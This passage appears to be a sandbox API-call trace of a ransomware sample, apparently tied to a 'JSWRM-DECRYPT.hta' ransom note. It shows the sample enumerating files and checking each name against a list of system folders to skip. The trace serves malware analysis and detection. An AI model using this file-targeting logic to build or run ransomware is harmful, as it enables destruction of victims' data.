returned 0x241268 [0067.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241268, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0067.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241380 [0067.580] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM-DECRYPT.hta", cchWideChar=17, lpMultiByteStr=0x241380, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM-DECRYPT.hta", lpUsedDefaultChar=0x0) returned 17 [0067.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.580] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d920 [0067.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0067.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241380 | out: hHeap=0x1e0000) returned 1 [0067.580] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.580] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xa2e72000, ftLastWriteTime.dwHighDateTime=0x1d0b361, nFileSizeHigh=0x0, nFileSizeLow=0x578d8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="MavInject32.exe", cAlternateFileName="MAVINJ~1.EXE")) returned 1 [0067.580] lstrcmpiW (lpString1="MavInject32.exe", lpString2=".") returned 1 [0067.580] lstrcmpiW (lpString1="MavInject32.exe", lpString2="..") returned 1 [0067.581] lstrcmpiW (lpString1="MavInject32.exe", lpString2="...") returned 1 [0067.581] lstrcmpiW (lpString1="MavInject32.exe", lpString2="windows") returned -1 [0067.581] lstrcmpiW (lpString1="MavInject32.exe", lpString2="recovery") returned -1 [0067.581] lstrcmpiW (lpString1="MavInject32.exe", lpString2="perflogs") returned -1 [0067.581] lstrcmpiW (lpString1="MavInject32.exe", lpString2="documents and settings") returned 1 [0067.581] lstrcmpiW (lpString1="MavInject32.exe", lpString2="$RECYCLE.BIN") returned 1 [0067.581] lstrcmpiW (lpString1="MavInject32.exe", lpString2="system volume information") returned -1 [0067.581] lstrcmpiW (lpString1="MavInject32.exe", lpString2="msocache") returned -1 [0067.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MavInject32.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MavInject32.exe", cchWideChar=15, lpMultiByteStr=0x345ef40, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MavInject32.exe", lpUsedDefaultChar=0x0) returned 15 [0067.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241128 [0067.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MavInject32.exe", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0067.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="MavInject32.exe", cchWideChar=15, lpMultiByteStr=0x345ef10, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="MavInject32.exe", lpUsedDefaultChar=0x0) returned 15 [0067.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241128 | out: hHeap=0x1e0000) returned 1 [0067.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23cca8 [0067.581] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d920 | out: hHeap=0x1e0000) returned 1 [0067.581] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80b8a5e2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80b8a5e2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x8745c00, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x2ffa60, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="mso20win32client.dll", cAlternateFileName="MSO20W~1.DLL")) returned 1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2=".") returned 1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2="..") returned 1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2="...") returned 1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2="windows") returned -1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2="recovery") returned -1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2="perflogs") returned -1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2="documents and settings") returned 1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2="system volume information") returned -1 [0067.581] lstrcmpiW (lpString1="mso20win32client.dll", lpString2="msocache") returned -1 [0067.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.581] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso20win32client.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0067.581] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fe8 [0067.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso20win32client.dll", cchWideChar=20, lpMultiByteStr=0x240fe8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mso20win32client.dll", lpUsedDefaultChar=0x0) returned 20 [0067.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso20win32client.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0067.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso20win32client.dll", cchWideChar=20, lpMultiByteStr=0x240ef8, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mso20win32client.dll", lpUsedDefaultChar=0x0) returned 20 [0067.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23dbc0 [0067.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23cca8 | out: hHeap=0x1e0000) returned 1 [0067.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fe8 | out: hHeap=0x1e0000) returned 1 [0067.582] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bb0837, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80bb0837, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xad6b600, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x475e60, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="mso30win32client.dll", cAlternateFileName="MSO30W~1.DLL")) returned 1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2=".") returned 1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2="..") returned 1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2="...") returned 1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2="windows") returned -1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2="recovery") returned -1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2="perflogs") returned -1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2="documents and settings") returned 1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2="system volume information") returned -1 [0067.582] lstrcmpiW (lpString1="mso30win32client.dll", lpString2="msocache") returned -1 [0067.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso30win32client.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0067.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240f48 [0067.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso30win32client.dll", cchWideChar=20, lpMultiByteStr=0x240f48, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mso30win32client.dll", lpUsedDefaultChar=0x0) returned 20 [0067.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso30win32client.dll", cchWideChar=20, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 20 [0067.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240fc0 [0067.582] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso30win32client.dll", cchWideChar=20, lpMultiByteStr=0x240fc0, cbMultiByte=20, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mso30win32client.dll", lpUsedDefaultChar=0x0) returned 20 [0067.582] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.582] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d7d0 [0067.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23dbc0 | out: hHeap=0x1e0000) returned 1 [0067.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240fc0 | out: hHeap=0x1e0000) returned 1 [0067.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240f48 | out: hHeap=0x1e0000) returned 1 [0067.583] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80bfccf1, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80bfccf1, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xb7179d00, ftLastWriteTime.dwHighDateTime=0x1d0d7a8, nFileSizeHigh=0x0, nFileSizeLow=0x307ac0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="mso40uires.dll", cAlternateFileName="MSO40U~1.DLL")) returned 1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2=".") returned 1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2="..") returned 1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2="...") returned 1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2="windows") returned -1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2="recovery") returned -1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2="perflogs") returned -1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2="documents and settings") returned 1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2="system volume information") returned -1 [0067.583] lstrcmpiW (lpString1="mso40uires.dll", lpString2="msocache") returned -1 [0067.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2412e0 [0067.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso40uires.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso40uires.dll", cchWideChar=14, lpMultiByteStr=0x345ef40, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mso40uires.dll", lpUsedDefaultChar=0x0) returned 14 [0067.583] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2412e0 | out: hHeap=0x1e0000) returned 1 [0067.583] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241308 [0067.583] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso40uires.dll", cchWideChar=14, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 14 [0067.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso40uires.dll", cchWideChar=14, lpMultiByteStr=0x345ef10, cbMultiByte=14, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mso40uires.dll", lpUsedDefaultChar=0x0) returned 14 [0067.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241308 | out: hHeap=0x1e0000) returned 1 [0067.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d680 [0067.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d7d0 | out: hHeap=0x1e0000) returned 1 [0067.635] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c22f4a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80c22f4a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x10cc9700, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0x8e6060, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="mso40uiwin32client.dll", cAlternateFileName="MSO40U~2.DLL")) returned 1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2=".") returned 1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2="..") returned 1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2="...") returned 1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2="windows") returned -1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2="recovery") returned -1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2="perflogs") returned -1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2="documents and settings") returned 1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2="system volume information") returned -1 [0067.635] lstrcmpiW (lpString1="mso40uiwin32client.dll", lpString2="msocache") returned -1 [0067.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso40uiwin32client.dll", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0067.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241268 [0067.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso40uiwin32client.dll", cchWideChar=22, lpMultiByteStr=0x241268, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mso40uiwin32client.dll", lpUsedDefaultChar=0x0) returned 22 [0067.635] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.635] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f84e8 [0067.635] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso40uiwin32client.dll", cchWideChar=22, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 22 [0067.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241330 [0067.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="mso40uiwin32client.dll", cchWideChar=22, lpMultiByteStr=0x241330, cbMultiByte=22, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="mso40uiwin32client.dll", lpUsedDefaultChar=0x0) returned 22 [0067.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f84e8 | out: hHeap=0x1e0000) returned 1 [0067.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235df0 [0067.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d680 | out: hHeap=0x1e0000) returned 1 [0067.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241330 | out: hHeap=0x1e0000) returned 1 [0067.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241268 | out: hHeap=0x1e0000) returned 1 [0067.636] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x808dbb6b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x808dbb6b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x11fdc400, ftLastWriteTime.dwHighDateTime=0x1d0d7aa, nFileSizeHigh=0x0, nFileSizeLow=0xee60, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="msointl30.en-us.dll", cAlternateFileName="MSOINT~1.DLL")) returned 1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2=".") returned 1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2="..") returned 1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2="...") returned 1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2="windows") returned -1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2="recovery") returned -1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2="perflogs") returned -1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2="documents and settings") returned 1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2="system volume information") returned -1 [0067.636] lstrcmpiW (lpString1="msointl30.en-us.dll", lpString2="msocache") returned 1 [0067.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msointl30.en-us.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x240ef8 [0067.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msointl30.en-us.dll", cchWideChar=19, lpMultiByteStr=0x240ef8, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msointl30.en-us.dll", lpUsedDefaultChar=0x0) returned 19 [0067.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x1f8328 [0067.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msointl30.en-us.dll", cchWideChar=19, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 19 [0067.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x241358 [0067.636] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msointl30.en-us.dll", cchWideChar=19, lpMultiByteStr=0x241358, cbMultiByte=19, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msointl30.en-us.dll", lpUsedDefaultChar=0x0) returned 19 [0067.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x1f8328 | out: hHeap=0x1e0000) returned 1 [0067.636] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xa0) returned 0x23d530 [0067.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235df0 | out: hHeap=0x1e0000) returned 1 [0067.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x241358 | out: hHeap=0x1e0000) returned 1 [0067.636] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x240ef8 | out: hHeap=0x1e0000) returned 1 [0067.636] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80c9565a, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80c9565a, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0x1909ea00, ftLastWriteTime.dwHighDateTime=0x1d098bf, nFileSizeHigh=0x0, nFileSizeLow=0xa12a8, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="msvcp120.dll", cAlternateFileName="")) returned 1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2=".") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2="..") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2="...") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2="windows") returned -1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2="recovery") returned -1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2="perflogs") returned -1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2="documents and settings") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2="$RECYCLE.BIN") returned 1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2="system volume information") returned -1 [0067.637] lstrcmpiW (lpString1="msvcp120.dll", lpString2="msocache") returned 1 [0067.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2411c8 [0067.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef40, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0067.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2411c8 | out: hHeap=0x1e0000) returned 1 [0067.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x20) returned 0x2410d8 [0067.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0067.637] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="msvcp120.dll", cchWideChar=12, lpMultiByteStr=0x345ef10, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="msvcp120.dll", lpUsedDefaultChar=0x0) returned 12 [0067.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2410d8 | out: hHeap=0x1e0000) returned 1 [0067.637] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x90) returned 0x23b400 [0067.637] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23d530 | out: hHeap=0x1e0000) returned 1 [0067.637] FindNextFileW (in: hFindFile=0x231dc0, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80cbb8b2, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0x80cbb8b2, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xf6c5dd00, ftLastWriteTime.dwHighDateTime=0x1d0c58c, nFileSizeHigh=0x0, nFileSizeLow=0x9b0a0, dwReserved0=0x60002, dwReserved1=0x20942e, cFileName="msvcp140.dll", cAlternateFileName="")) returned 1 [0067.637] 